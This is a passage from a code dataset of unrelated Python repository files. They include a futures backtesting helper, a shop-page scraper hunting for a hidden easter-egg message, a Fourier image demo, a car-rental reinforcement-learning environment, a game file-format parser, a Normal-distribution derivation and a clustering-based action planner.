range(0,len(code_list)-1):\n for j in range(i+1,len(code_list)):\n futName = contract_list[j]+\"_\"+contract_list[i]\n monName = code[contract_list[j]]+\"_\"+code[contract_list[i]]\n code[futName] = monName\n \n return code\n\ndef tradeFilter(tradeList, priority, monthCodeMap):\n priority_code = list()\n\n for ticker in priority:\n priority_code.append(monthCodeMap[ticker])\n priorityMap = dict()\n TopOrder = 100 # this looks stupid, is there a better to get Top priority trade\n TopOrderTrade = None\n for trade in tradeList:\n ticker = trade.ticker\n order = priority_code.index(ticker)\n priorityMap[ticker] = order\n if TopOrder > order:\n TopOrder = order\n TopOrderTrade = trade\n tradeList = list()\n tradeList.append(TopOrderTrade) \n return tradeList\n\n\n\n\n\n \n\n\n\n","repo_name":"project-rubick/master","sub_path":"BackTestingHeader.py","file_name":"BackTestingHeader.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6218304812","text":"import logging\nimport random\nimport re\nimport sys\nfrom time import sleep\n\nimport requests\n\nlogger = logging.getLogger(__name__)\n\nSECRETS = []\nSECRET_TEXT = 'Sie haben einen Geist gefunden'\nUSER_AGENT = 'Mozilla/5.0 (X11; 
Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0'\n\n\ndef check_article_for_secret(s: requests.Session, pr_link: str, ref_link: str):\n '''\n Checks an article for a secret and stores the article number if it exists\n '''\n\n try:\n r = s.get(\n url=pr_link,\n headers={ 'Referer': ref_link }\n )\n\n except requests.exceptions.RequestException:\n logger.error('[-] Request failed, terminating...', exc_info=True)\n sys.exit(1)\n\n data = r.text\n\n if data.find(SECRET_TEXT) != -1:\n logger.info(f'[+] Found secret at {pr_link}')\n g = re.findall(r'(\\d*)<', data)\n SECRETS.append(g[0])\n\n\ndef get_articles(s: requests.Session, mf_link: str):\n '''\n Finds all products and checks each for a secret\n '''\n\n try:\n r = s.get(\n url=mf_link,\n headers={ 'Referer': 'https://www.mindfactory.de/' }\n )\n\n except requests.exceptions.RequestException:\n logger.error('[-] Request failed, terminating...', exc_info=True)\n sys.exit(1)\n\n articles = re.findall(r'\"(.*)\" class=\"p-complete-link visible-xs visible-sm', r.text)\n\n for article_link in articles:\n check_article_for_secret(s, article_link, mf_link)\n\n\ndef main():\n '''\n finds hidden secrets on mindfactory\n '''\n\n all_links = ['']\n\n sess = requests.Session()\n\n # set user cookies\n sess.cookies.set('NSid', '', domain='.mindfactory.de', path='/')\n sess.cookies.set('lz_userid', '', domain='chat.mindfactory.de', path='/livezilla')\n sess.cookies.set('cookies_accepted', 'true')\n\n # set user agent\n sess.headers.update({'User-Agent': USER_AGENT})\n\n for link in all_links:\n\n if not link.endswith('/article_per_page/5'):\n link = f'{link}/article_per_page/5'\n\n get_articles(sess, link)\n logger.debug('Waiting for next link...')\n sleep(3)\n\n if SECRETS:\n logger.info(f'[+] article numbers: {\",\".join(SECRETS)}')\n else:\n logger.warn('[-] No secrets found?')\n\n return 0\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(levelname)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename='spam.log',\n filemode='a'\n )\n c = logging.StreamHandler()\n c.setLevel(logging.INFO)\n f = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n c.setFormatter(f)\n logger.addHandler(c)\n sys.exit(int(main() or 0))\n","repo_name":"HeleleF/scraper","sub_path":"mfscraper.py","file_name":"mfscraper.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13883801543","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport cv2\r\nfrom matplotlib import pyplot as plt\r\n\r\n# 画像をグレースケールで読み込む\r\nimg = cv2.imread('/Users/kiyotakoki/dev/com_vis/07_DFT/sakurajima.jpeg',0)\r\n\r\n# DFT\r\ndft = cv2.dft(np.float32(img),flags = cv2.DFT_COMPLEX_OUTPUT)\r\n# 結果をシフト\r\ndft_shift = np.fft.fftshift(dft)\r\n\r\n# 見易いスケールに変換\r\nmagnitude_spectrum = 20*np.log(cv2.magnitude(dft_shift[:,:,0],dft_shift[:,:,1]))\r\n\r\nplt.subplot(121),plt.imshow(img, cmap = 'gray')\r\nplt.title('Input Image'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(122),plt.imshow(magnitude_spectrum, cmap = 'gray')\r\nplt.title('Magnitude Spectrum'), plt.xticks([]), plt.yticks([])\r\nplt.show()\r\n\r\ncv2.imwrite(\"magnitude_spectrum.png\", magnitude_spectrum)\r\n\r\n","repo_name":"kkiyota63/ImageProcessing","sub_path":"07_DFT/07_sample01.py","file_name":"07_sample01.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"470428478","text":"import numpy as np\nimport sys\nimport math\n\nfrom gym.envs.toy_text import discrete\n\ndef clipped_poisson(lam, max_k):\n \"\"\"\n Return poisson PMF clipped at max_k with remaining tail probability\n placed at max_k.\n \"\"\"\n pmf = np.zeros(max_k + 1)\n for k in range(max_k):\n pmf[k] = math.exp(-lam) * lam**k / math.factorial(k)\n pmf[max_k] = 1 - np.sum(pmf)\n \n return pmf \n\n\nclass JackCarRentalEnv(discrete.DiscreteEnv):\n \"\"\" Example 4.2 from Reinforcement Learning: An Introduction by Sutton and Barto.\n \"\"\"\n\n def build_pmfs(self, lambda_request, lambda_return, max_cars):\n \"\"\"\n Return p(new_rentals, returns | initial_cars) as numpy array:\n p[initial_cars, new_rentals, returns]\n \"\"\"\n pmf = np.zeros((max_cars+1, max_cars+1, max_cars+1))\n\n for init_cars in range(max_cars + 1):\n new_rentals_pmf = clipped_poisson(lambda_request, init_cars)\n for new_rentals in range(init_cars + 1):\n max_returns = max_cars - init_cars + new_rentals\n returns_pmf = clipped_poisson(lambda_return, max_returns)\n for returns in range(max_returns + 1):\n p = returns_pmf[returns] * new_rentals_pmf[new_rentals]\n pmf[init_cars, new_rentals, returns] = p\n \n return pmf\n\n def get_transition_model(self, s, a):\n \"\"\"\n Inputs: state as 2-tuple / action as -2,-1,0,1,2 [-max,max]\n Returns a 2-tuple:\n 1. p(s'| s, a) as dictionary:\n keys = s'\n values = p(s' | s, a)\n 2. E(r | s, a, s') as dictionary:\n keys = s'\n values = E(r | s, a, s')\n \"\"\"\n s = (s[0] - a, s[1] + a) # move a cars from loc1 to loc2 \n s = np.clip(s,0,self.max_cars) # impossible actions are cliped to possible states\n\n move_reward = -math.fabs(a) * 2 # ($2) per car moved\n t_prob, expected_r = ([{}, {}], [{}, {}])\n for loc in range(2):\n morning_cars = s[loc]\n rent_return_pmf = self.rent_return_pmf[loc]\n for rents in range(morning_cars + 1):\n max_returns = self.max_cars - morning_cars + rents\n for returns in range(max_returns + 1):\n p = rent_return_pmf[morning_cars, rents, returns]\n if p < 1e-5:\n continue\n s_prime = morning_cars - rents + returns\n r = rents * 10\n t_prob[loc][s_prime] = t_prob[loc].get(s_prime, 0) + p\n expected_r[loc][s_prime] = expected_r[loc].get(s_prime, 0) + p * r\n \n # join probabilities and expectations from loc1 and loc2\n t_model, r_model = ({}, {})\n for s_prime1 in t_prob[0]:\n for s_prime2 in t_prob[1]:\n p1 = t_prob[0][s_prime1] # p(s' | s, a) for loc1\n p2 = t_prob[1][s_prime2] # p(s' | s, a) for loc2\n t_model[(s_prime1, s_prime2)] = p1 * p2\n # expectation of reward calculated using p(s', r | s, a)\n # need to normalize by p(s' | s, a)\n norm_E1 = expected_r[0][s_prime1] / p1\n norm_E2 = expected_r[1][s_prime2] / p2\n\n norm_E1 = 10*round(norm_E1 / 10)\n norm_E2 = 10*round(norm_E2 / 10)\n\n r_model[(s_prime1, s_prime2)] = norm_E1 + norm_E2 + move_reward\n \n return t_model, r_model\n\n\n\n\n\n def __init__(self, max_cars = 4, rents_per_day = (3,4), returns_per_day = (3,2) ):\n \"\"\" The environment is a DiscreteEnv Gym with the following members:\n - nS: number of states\n - nA: number of actions\n - P: transitions (*)\n - isd: initial state distribution (**)\n (*) dictionary dict of dicts of lists, where\n P[s][a] == [(probability, nextstate, reward, done), ...]\n (**) list or array of length nS\n \"\"\"\n\n self.max_cars = max_cars\n self.max_move_cars = int(max_cars / 4)\n self.grid_shape = (max_cars+1,max_cars+1)\n self.rents_per_day = rents_per_day\n self.returns_per_day = returns_per_day\n\n print(\"Initialized JackCarRental 
Environment : %d max_cars %d max_moving cars\"%(max_cars,self.max_move_cars))\n\n nS = np.prod(self.grid_shape)\n nA = len(np.arange(-self.max_move_cars, self.max_move_cars + 1))\n\n # pre-build the rentals/returns pmf for each location\n self.rent_return_pmf = [self.build_pmfs(self.rents_per_day[i], self.returns_per_day[i], max_cars) for i in [0,1] ]\n\n P = {}\n for s_index in range(nS):\n s = np.unravel_index(s_index, self.grid_shape)\n P[s_index] = { a : [] for a in range(nA) }\n\n max_a = min(self.max_move_cars, s[0], max_cars-s[1])\n min_a = max(-self.max_move_cars, -s[1], -(max_cars-s[0]))\n \n for a_real in range(min_a, max_a+1):\n a = a_real + self.max_move_cars\n state_real = np.array(s) + np.array([-a_real, a_real])\n\n t_model, r_model = self.get_transition_model(s, a_real)\n for sp in t_model:\n p = t_model[sp]\n r = r_model[sp]\n sp_index = np.ravel_multi_index(sp,self.grid_shape)\n P[s_index][a].append([p, sp_index, r, False])\n\n isd = np.zeros(nS)\n isd[int(nS/2)] = 1.0\n super(JackCarRentalEnv, self).__init__(nS, nA, P, isd)\n\n def render(self):\n print(\"nothing to render\")\n\n\n","repo_name":"santmarti/SDIC-Code","sub_path":"notebooks/environments/jackcar.py","file_name":"jackcar.py","file_ext":"py","file_size_in_byte":5642,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"10131910528","text":"import numpy as np\n\n\nclass LinearGaussianPolicy:\n\n def __init__(self, weights=None, noise=None):\n if weights is not None:\n self.weights = weights\n self.output, self.input = self.weights.shape\n if noise is not None and isinstance(noise, (int, float, complex)):\n noise = np.diag(np.ones(self.output)*noise)\n self.noise = noise\n\n def get_weights(self):\n return self.weights\n\n def set_weights(self, weights, noise=None):\n self.weights = weights\n self.output, self.input = self.weights.shape\n if noise is not None and isinstance(noise, (int, float, complex)):\n noise = np.diag(np.ones(self.output)*noise)\n self.noise = noise\n\n def _add_noise(self):\n noise = np.random.multivariate_normal(np.zeros(self.output), self.noise, 1).T\n return noise\n\n def act(self, X, stochastic=True):\n X = X.reshape(self.input, 1)\n y = np.dot(self.weights, X)\n if self.noise is not None and stochastic:\n y += self._add_noise()\n return y\n\n def step(self, X, stochastic=False):\n return None, self.act(X, stochastic), None, None\n\n def compute_gradients(self, X, y, diag=False):\n X = np.array(X).reshape(self.input, 1)\n y = np.array(y).reshape(self.output, 1)\n mu = np.dot(self.weights, X)\n if diag:\n return np.diag((np.dot(np.linalg.inv(self.noise), np.dot((y - mu), X.T))))\n else:\n return (np.dot(np.linalg.inv(self.noise), np.dot((y - mu), X.T))).flatten()\n","repo_name":"gioramponi/sigma-girl-MIIRL","sub_path":"policies/linear_gaussian_policy.py","file_name":"linear_gaussian_policy.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"38949272652","text":"# Source: http://www.metroid2002.com/retromodding/wiki/HINT_(File_Format)\n\nimport dataclasses\nimport struct\n\nfrom util import unpack_null_terminated_ascii, pack_null_terminated_ascii\n\n__all__ = (\"HintLocation\", \"Hint\", \"HINT\")\n\n\n@dataclasses.dataclass(frozen=True)\nclass HintLocation:\n _struct = struct.Struct(\">IIII\")\n\n world_MLVL_asset_ID: int\n room_MREA_asset_ID: int\n room_index: int\n map_text_STRG_asset_ID: int\n\n @classmethod\n def 
from_packed(cls, packed: bytes):\n return cls(*cls._struct.unpack(packed))\n\n @property\n def packed_size(self) -> int:\n return 4 + 4 + 4 + 4\n\n def packed(self) -> bytes:\n return self._struct.pack(\n self.world_MLVL_asset_ID,\n self.room_MREA_asset_ID,\n self.room_index,\n self.map_text_STRG_asset_ID,\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass Hint:\n _struct = struct.Struct(\">ffIII\")\n\n name: str\n immediate_time: float\n normal_time: float\n text_STRG_asset_ID: int\n page_count: int\n location_count: int\n locations: tuple = dataclasses.field(repr=False)\n\n @classmethod\n def from_packed(cls, packed: bytes):\n offset = packed.index(b\"\\x00\") + 1\n name = unpack_null_terminated_ascii(packed[:offset])\n\n immediate_time, normal_time, text_STRG_asset_ID, \\\n page_count, location_count = cls._struct.unpack(packed[offset:offset+20])\n offset += 20\n\n return cls(\n name,\n immediate_time,\n normal_time,\n text_STRG_asset_ID,\n page_count,\n location_count,\n tuple(HintLocation.from_packed(packed[offset + 16*i:offset + 16*(i+1)]) for i in range(location_count)),\n )\n\n @property\n def packed_size(self) -> int:\n return len(self.packed())\n\n def packed(self) -> bytes:\n return b\"\".join((\n pack_null_terminated_ascii(self.name),\n self._struct.pack(\n self.immediate_time,\n self.normal_time,\n self.text_STRG_asset_ID,\n self.page_count,\n self.location_count,\n ),\n *(location.packed() for location in self.locations),\n ))\n\n\n@dataclasses.dataclass(frozen=True)\nclass HINT:\n _struct = struct.Struct(\">III\")\n\n magic: int\n version: int\n hint_count: int\n hints: tuple = dataclasses.field(repr=False)\n\n @classmethod\n def from_packed(cls, packed: bytes):\n magic, version, hint_count = cls._struct.unpack(packed[:12])\n\n offset = 12\n hints = []\n for i in range(hint_count):\n hint = Hint.from_packed(packed[offset:])\n hints.append(hint)\n offset += hint.packed_size\n\n return cls(magic, version, hint_count, tuple(hints))\n\n @property\n def packed_size(self) -> int:\n return len(self.packed())\n\n def packed(self) -> bytes:\n return b\"\".join(\n self._struct.pack(self.magic, self.version, self.hint_count),\n *(hint.packed() for hint in self.hints),\n )\n\n def with_hints_replaced(self, new_hints):\n new_hints = tuple(new_hints)\n return dataclasses.replace(self, hint_count=len(new_hints), hints=new_hints)","repo_name":"SpaghettiToastBook/echoes-patching-library","sub_path":"hint.py","file_name":"hint.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72077204967","text":"import os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\ndef database_infos_func():\n database_infos = {\n \"app_key\": \"app_key\",\n \"app_secret\": \"33app_secret7f2cb08516d060a37c47243b91d20f\",\n \"codigo_conta_corrente\": \"codigo_conta_corrente\",\n \"estoque_box\": \"estoque_box\",\n \"codigo_local_estoque_galpao\": \"codigo_local_estoque_galpao\",\n \"app_key_parceiro\": os.getenv(\"APP_KEY_PARCEIRO\"),\n \"app_secret_parceiro\": os.getenv(\"APP_SECRET_PARCEIRO\")\n }\n return database_infos","repo_name":"VinicioSales/controladorDeEstoques","sub_path":"config/credenciais/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72870935848","text":"\n\n\"\"\"\nDerivation of the normalizing constant for the standard Normal 
distribution\n===========================================================================\n\nBelow we illustrate how to derive this constant analytically and and how to\napproximate it by sampling.\n\nAnalytical derivation\n---------------------\n\nThe probability density function of a standard Normal distribution, :math:`f_Z(z)` is\n\n.. math::\n f_Z(z)=\\\\frac{1}{K}\\exp(-\\\\frac{z^2}{2})\n\nBecause :math:`f_Z(z)` is a probability density function, it follows that\n\n.. math::\n 1=\\int_{-\\infty}^\\infty f_Z(z)dz=\\\\frac{1}{K}\\int_{-\\infty}^\\infty\\exp(-\\\\frac{z^2}{2})dz\n\nThen\n\n.. math::\n \\\\begin{align}\n K&=\\int_{-\\infty}^\\infty\\exp(-\\\\frac{z^2}{2})dz\\\\\\\\\n K^2&=\\int_{-\\infty}^\\infty\\int_{-\\infty}^\\infty\\exp(-\\\\frac{x^2}{2})\\exp(-\\\\frac{y^2}{2})dxdy=\\int_{-\\infty}^\\infty\\int_{-\\infty}^\\infty\\exp(-\\\\frac{x^2+y^2}{2}))dxdy\n \\\\end{align}\n\n\nWe now make the change of variables\n\n.. math::\n \\\\begin{align}\n r&=\\sqrt{x^2+y^2}\\\\\\\\\n \\\\theta&=\\\\arctan(\\\\frac{x}{y})\n \\\\end{align}\n\n\nfor which\n\n.. math::\n \\\\begin{align}\n x(r,\\\\theta)&=r\\cos(\\\\theta)\\\\\\\\\n y(r,\\\\theta)&=r\\sin(\\\\theta)\n \\\\end{align}\n\nwith Jacobian\n\n.. math::\n \\\\begin{align}\n J(r,\\\\theta)=\\\\left |\\\\begin{array}{cc}\n \\\\frac{\\\\partial x}{\\\\partial r}(r,\\\\theta)&\\\\frac{\\\\partial x}{\\\\partial \\\\theta}(r,\\\\theta)\\\\\\\\\n \\\\frac{\\\\partial y}{\\\\partial r}(r,\\\\theta)&\\\\frac{\\\\partial y}{\\\\partial \\\\theta}(r,\\\\theta)\n \\\\end{array}\\\\right |\n =\\\\left |\\\\begin{array}{cc}\n \\cos(\\\\theta) & -r\\sin(\\\\theta)\\\\\\\\\n \\sin(\\\\theta) & r\\cos(\\\\theta)\n \\\\end{array}\\\\right |\n =r\\\\cos^2(\\\\theta)+r\\\\sin^2(\\\\theta)=r(\\\\cos^2(\\\\theta)+\\\\sin^2(\\\\theta))=r\n \\\\end{align}\n\nand obtain\n\n.. math::\n \\\\begin{align}\n K^2&=\\int_0^{2\\pi}\\int_0^\\infty\\exp(-\\\\frac{r^2}{2}))|J(r,\\\\theta)|drd\\\\theta=\\int_0^{2\\pi}\\int_0^\\infty\n r\\exp(-\\\\frac{r^2}{2})drd\\\\theta=\\int_0^{2\\pi}\\left(\\left.\\exp(-\\\\frac{r^2}{2}))\\\\right\n |_0^\\infty\\\\right)d\\\\theta\\\\\\\\\n &=\\int_0^{2\\pi}1d\\\\theta=2\\pi\n \\\\end{align}\n\nthen :math:`K=\\sqrt{2\\pi}\\simeq 2.51`.\n\nEstimation by sampling\n----------------------\n\nWe can also estimate :math:`K` by sampling. :math:`K` is the area under the\nfunction :math:`\\\\tilde{f}_Z(z)=\\\\exp(-\\\\frac{z^2}{2})`. To estimate this area\nwe \n\n\n1. enclose most of the function :math:`\\\\tilde{f}_Z(z)` by a box, \n\n2. draw uniformly distributed samples in this box.\n\n3. calculate the proportion of samples below :math:`\\\\tilde{f}_Z(z)`.\n\nNow, the ratio of the area under the function :math:`\\\\tilde{f}_Z(z)`,\n:math:`K`, to the area\nof the enclosing box, :math:`B`, should be similar to the proportion of uniformly distributed\nsamples in the box that fell below function :math:`\\\\tilde{f}_Z(z)`,\n:math:`p\\_under`. 
That is :math:`\\\\frac{K}{B}\\\\simeq p\\_under`, or\n:math:`K\\simeq B\\;p\\_under`.\n\n\"\"\"\n\n#%%\n# Import requirements\n# -------------------\n\nimport numpy as np\nimport plotly.graph_objects as go\n\n\n#%%\n# Define constant\n# ---------------\n\nlower_z = -5.0\nupper_z = 5.0\nn_z = 1000\nn_random = 100000\n\nzs = np.linspace(lower_z, upper_z, n_z)\nf_hat = lambda z: np.exp(-z**2/2)\nf_hat_values = f_hat(zs)\nbox_height = f_hat(0)\nbox = np.ones(n_z)\n\n#%%\n# Sample uniform points in the box\n# --------------------------------\n\nrandom_x = np.random.uniform(low=lower_z, high=upper_z, size=n_random)\nrandom_y = np.random.uniform(low=0, high=1, size=n_random)\n\n#%%\n# Calculate the proportion of samples below unnormalized pdf\n# ----------------------------------------------------------\n\ncount_under = 0\nindices_under = []\nindices_above = []\nfor i in range(n_random):\n if random_y[i] lower_KL_divergance_threshold:\n search_levels_dict[level].append(predicted_probas['Push'])\n # search_KL_divergance[level].append(scipy.stats.entropy(predicted_probas['Push'], goal_proba))\n search_KL_divergance[level].append(scipy.stats.entropy(goal_proba + 1e-10, predicted_probas['Push'] + 1e-10))\n search_action_dict[level].append(copy.deepcopy(search_action_dict[pre_level][proba_index]))\n search_action_dict[level][-1].append('Push')\n\n if mate_predict_kl > lower_KL_divergance_threshold:\n search_levels_dict[level].append(predicted_probas['Mate'])\n # search_KL_divergance[level].append(scipy.stats.entropy(predicted_probas['Mate'], goal_proba))\n search_KL_divergance[level].append(scipy.stats.entropy(goal_proba + 1e-10, predicted_probas['Mate'] + 1e-10))\n search_action_dict[level].append(copy.deepcopy(search_action_dict[pre_level][proba_index]))\n search_action_dict[level][-1].append('Mate')\n\n # print('search_KL_divergance: ', search_KL_divergance)\n # print('search_action_dict: ', search_action_dict)\n # exit()\n\n def insert_queue(KL_action_pair: list, KL_action_queue: list):\n cur_KL_divergances = []\n for pair in KL_action_queue:\n cur_KL_divergances.append(pair[0])\n cur_KL_divergances = np.array(cur_KL_divergances)\n insert_index = np.sum(KL_action_pair[0] > cur_KL_divergances)\n KL_action_queue.insert(insert_index, KL_action_pair)\n\n return\n\n lower_KL_action_queue = []\n higher_KL_action_queue = []\n best_action_pair = None\n\n for i in range(0, search_level):\n\n level = '{}_level'.format(i)\n\n for KL_index, KL_divergance in enumerate(search_KL_divergance[level]):\n\n KL_action_pair = [KL_divergance, search_action_dict[level][KL_index]]\n\n if KL_divergance < lower_KL_divergance_threshold:\n insert_queue(KL_action_pair=KL_action_pair, KL_action_queue=lower_KL_action_queue)\n\n elif KL_divergance < higher_KL_divergance_threshold:\n insert_queue(KL_action_pair=KL_action_pair, KL_action_queue=higher_KL_action_queue)\n\n if not len(lower_KL_action_queue) == 0:\n best_action_pair = lower_KL_action_queue[0]\n break\n\n predicted_probs = []\n\n if best_action_pair is None and not len(higher_KL_action_queue) == 0:\n best_action_pair = higher_KL_action_queue[0]\n\n if len(lower_KL_action_queue) == 0 and len(higher_KL_action_queue) == 0:\n return None, [], [], {}\n\n if len(best_action_pair[1]) == 0:\n return 'End', ['End'], [], {}\n else:\n plan = copy.deepcopy(best_action_pair[1])\n plan_copy = copy.deepcopy(plan)\n while len(plan_copy):\n for key, value in search_action_dict.items():\n if plan_copy in value:\n predicted_probs.append(search_levels_dict[key][value.index(plan_copy)])\n 
plan_copy.pop()\n predicted_probs.reverse()\n plan.append('End')\n\n for index, action in enumerate(plan):\n if action != 'End':\n action_prob_dict[action.lower()] = predicted_probs[index]\n\n return plan[0], plan, predicted_probs, action_prob_dict\n\n\ndef find_end_state_distribution():\n latent_vectors_test = np.load(file_path(file_name=encoded_latent_vectors_npy, file_path=True, split='train'))\n image_labels_test = np.load(file_path(file_name=image_labels_npy, file_path=True, split='train'))\n\n if len(np.unique(image_labels_test)) == 4:\n ending = end_label\n elif len(np.unique(image_labels_test)) == 11:\n ending = end_states\n\n for state in ending:\n vector_index_options = np.where(image_labels_test == state)[0]\n summation = np.zeros((cluster_center_num))\n for index in vector_index_options:\n summation = latent_vec_2_cluster_proba(latent_vectors_test[index, :]) + summation\n\n end_state_distibution = summation / np.sum(summation)\n np.save(file_path(file_name=end_state_distribution_npy, file_path=False, split=None), end_state_distibution)\n return end_state_distibution\n\n\ndef plan_test(end_state_distribution: np.ndarray=None):\n latent_vectors_test = np.load(file_path(file_name=encoded_latent_vectors_npy, file_path=True, split='test'))\n image_labels_test = np.load(file_path(file_name=image_labels_npy, file_path=True, split='test'))\n\n latent_vectors_train = np.load(file_path(file_name=encoded_latent_vectors_npy, file_path=True, split='train'))\n image_labels_train = np.load(file_path(file_name=image_labels_npy, file_path=True, split='train'))\n\n # eval_data_distribution(image_labels_test, latent_vectors_test)\n\n if len(np.unique(image_labels_test)) == 4:\n ending = end_label\n elif len(np.unique(image_labels_test)) == 11:\n ending = end_states\n\n if isinstance(end_state_distribution, np.ndarray):\n goal_proba = end_state_distribution\n\n elif end_state_distribution is None:\n goal_proba = np.load(file_path(file_name=end_state_distribution_npy, file_path=True, split=None))\n\n # goal_proba =np.array([0, 1, 0, 0], dtype=np.float32)\n # print('goal_proba: ', goal_proba)\n # print('latent_vectors_test: ', latent_vectors_test.shape)\n # print('image_labels_test: ', image_labels_test.shape)\n \n average_vectors = {}\n for i in np.unique(image_labels_test):\n i_indices = np.where(image_labels_test == i)[0]\n for index in i_indices:\n # print('latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]): ', latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]).shape)\n proba = latent_vec_2_cluster_proba(latent_vectors_test[index, :]).reshape(-1, 4)\n # print('proba: ', proba)\n # exit()\n if i in list(average_vectors.keys()):\n average_vectors[i] += proba\n else:\n average_vectors[i] = proba\n average_vectors[i] /= len(i_indices)\n np.set_printoptions(precision=3, suppress=True)\n # print('test average_vectors: ', average_vectors)\n\n average_vectors = {}\n for i in np.unique(image_labels_train):\n i_indices = np.where(image_labels_train == i)[0]\n for index in i_indices:\n # print('latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]): ', latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]).shape)\n proba = latent_vec_2_cluster_proba(latent_vectors_train[index, :]).reshape(-1, 4)\n # print('proba: ', proba)\n # exit()\n if i in list(average_vectors.keys()):\n average_vectors[i] += proba\n else:\n average_vectors[i] = proba\n average_vectors[i] /= len(i_indices)\n np.set_printoptions(precision=3, suppress=True)\n # print('train average_vectors: ', 
average_vectors)\n\n # exit()\n\n success_num = 0\n first_success_num = 0\n test_num = 330\n tested_indices = []\n\n sequences_test_num = {}\n sequences_test_success_num = {}\n sequences_test_first_success_num = {}\n\n bar = Bar('Processing', max=test_num)\n for _ in range(test_num):\n while True:\n rand_index = np.random.randint(latent_vectors_test.shape[0])\n\n initial_label = image_labels_test[rand_index]\n cur_label = copy.deepcopy(initial_label)\n # if not cur_label == 3:\n # continue\n\n cur_latent_vector = latent_vectors_test[rand_index, :]\n\n if not rand_index in tested_indices:\n break\n tested_indices.append(rand_index)\n\n Groundtruth_plan = groundtruth_plan[action_type[initial_label]]\n initial_plan = None\n executed_plan = []\n if not action_type[initial_label] in list(sequences_test_num.keys()):\n sequences_test_num[action_type[initial_label]] = 1\n sequences_test_success_num[action_type[initial_label]] = 0\n sequences_test_first_success_num[action_type[initial_label]] = 0\n\n sequences_test_num[action_type[initial_label]] += 1\n\n loop_times = 0\n while True:\n proba = latent_vec_2_cluster_proba(cur_latent_vector)\n # test = search_plan(init_proba=proba, goal_proba=goal_proba)\n # print(len(test))\n predicted_action, plan, _, _ = search_plan(init_proba=proba, goal_proba=goal_proba)\n # print('cur_label: ', list(action_type.values())[int(cur_label)])\n # print('plan: ', plan)\n # print('#'*50)\n\n if not plan is None and initial_plan is None:\n initial_plan = copy.deepcopy(plan)\n if not predicted_action is None:\n executed_plan.append(predicted_action)\n\n if predicted_action == 'End' or predicted_action is None:\n break\n\n cur_label, cur_latent_vector = simulate_action(cur_label=cur_label,\n action=predicted_action,\n latent_vectors=latent_vectors_test,\n image_labels=image_labels_test)\n loop_times += 1\n if loop_times > 5:\n break\n # exit()\n # print('executed_plan: ', executed_plan)\n # print('initial_plan: ', initial_plan)\n # print('Groundtruth_plan: ', Groundtruth_plan)\n # exit()\n\n if initial_plan == executed_plan and initial_plan in Groundtruth_plan:\n sequences_test_first_success_num[action_type[initial_label]] += 1\n first_success_num += 1\n\n if cur_label in ending and not predicted_action is None:\n sequences_test_success_num[action_type[initial_label]] += 1\n success_num += 1\n bar.next()\n bar.finish()\n print('success rate: ', success_num / test_num)\n print('first success rate: ', first_success_num / test_num)\n print('#' * 50)\n for key, value in sequences_test_num.items():\n print('value: ', value)\n test_num_temp = value\n test_success_num_temp = sequences_test_success_num[key]\n test_first_success_num_temp = sequences_test_first_success_num[key]\n\n print('test num: ', value)\n print('success num: ', test_success_num_temp)\n print('first success num: ', test_first_success_num_temp)\n\n print('{} success rate: '.format(key), test_success_num_temp / test_num_temp)\n print('{} first success rate: '.format(key), test_first_success_num_temp / test_num_temp)\n\n return plan\n\n\ndef simulate_action(cur_label, action, latent_vectors, image_labels):\n\n Dynamic = {'Push': Push_dynamic, 'Mate': Mate_dynamic}\n next_labels = np.where(Dynamic[action][int(cur_label), :] == 1)[0]\n\n vector_index_options = np.where(image_labels == next_labels)[0]\n rand_vector_index = np.random.choice(vector_index_options)\n next_label = image_labels[rand_vector_index]\n next_laten_vector = latent_vectors[rand_vector_index, :]\n\n return next_label, next_laten_vector\n\n\ndef 
predict_proba(init_proba: np.ndarray):\n\n assert init_proba.shape[0] == cluster_center_num\n\n A = np.zeros((label_num, label_num))\n A_push = np.zeros((label_num, label_num))\n A_mate = np.zeros((label_num, label_num))\n A_self = np.eye(label_num)\n\n for push in Push:\n A[push[0], push[1]] = 1\n A_push[push[0], push[1]] = 1\n\n for mate in Mate:\n A[mate[0], mate[1]] = 1\n A_mate[mate[0], mate[1]] = 1\n\n for self_ in Self:\n A[self_[0], self_[1]] = 1\n for self_ in Push_self:\n A_push[self_[0], self_[1]] = 1\n for self_ in Mate_self:\n A_mate[self_[0], self_[1]] = 1\n\n A = normalize(A, axis=1, norm='l1')\n A_push = normalize(A_push, axis=1, norm='l1')\n A_mate = normalize(A_mate, axis=1, norm='l1')\n # print('A_push: ', np.where(A_push==1))\n # print('A_mate: ', np.where(A_mate==1))\n\n\n init_cluster_prob = init_proba\n\n init_cluster_prob /= np.sum(init_cluster_prob)\n\n P = np.zeros((cluster_center_num, cluster_center_num))\n\n P_purity_num = np.load(file_path(file_name=label_nums_npy, file_path=True, split=None))\n P_purity_num = P_purity_num.astype(int)\n\n P_purity_col_norm = normalize(P_purity_num, axis=0, norm='l1')\n P_purity_row_norm = normalize(P_purity_num, axis=1, norm='l1')\n np.set_printoptions(precision=3, suppress=True)\n # 